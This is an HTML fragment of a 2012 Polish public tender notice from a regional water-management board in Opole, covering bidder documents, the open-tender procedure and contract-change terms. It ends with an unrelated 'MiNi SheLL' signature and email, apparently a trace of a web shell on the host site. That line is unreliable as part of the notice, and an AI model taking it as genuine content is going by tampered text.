<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4.	Zgodnie z art. 144 Ustawy Pzp Zamawiający przewiduje zmiany zawartej umowy w stosunku do treści oferty wykonawcy. 

1)	Strony przewidują możliwość dokonania w Umowie następujących zmian:
a.	skrócenia albo wydłużenia terminu wykonania przedmiotu Umowy lub jej poszczególnych Etapów;
b.	zmniejszenie zakresu przedmiotu Umowy wraz z ograniczeniem należnego Wykonawcy wynagrodzenia.
2)	Ewentualne zmiany Umowy, o których mowa w ust. 1 zostaną dokonane w formie Aneksu do Umowy.
3)	Ponadto Zamawiający ma prawo jednostronnie zobowiązać Wykonawcę do dokonania następujących zmian w przedmiocie Umowy (Polecenie Zmiany):
a.	pominąć element przedmiotu Umowy;
b.	wykonać zamienne opracowania projektowe w ramach poszczególnych Etapów Umowy lub ich elementów;	
c.	zmienić kolejność wykonania poszczególny Etapów Umowy; 
d.	zmienić termin wykonania poszczególnych Etapów Umowy.
4)	Przed wydaniem Polecenia Zmiany Zamawiający może zobowiązać Wykonawcę do przedłożenia w określonym terminie stanowiska w zakresie:
a.	uzasadnienia dokonania zmiany; 
b.	opisu działań, czynności i opracowań niezbędnych do realizacji elementów przedmiotu Umowy objętych Poleceniem Zmiany;
5)	O zmianach teleadresowych, zmianach rachunku bankowego i tym podobnych Wykonawca powiadomi pisemnie Zamawiającego. Takie zmiany nie wymagają sporządzenia Aneksu do Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wzmiuw.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Opolu
ul. Katowicka 55
45-061 Opole.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2012 godzina 09:00, miejsce: 1.	Ofertę należy złożyć w siedzibie Zamawiającego w Opolu, ul. Katowicka 55, pokój nr 1 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com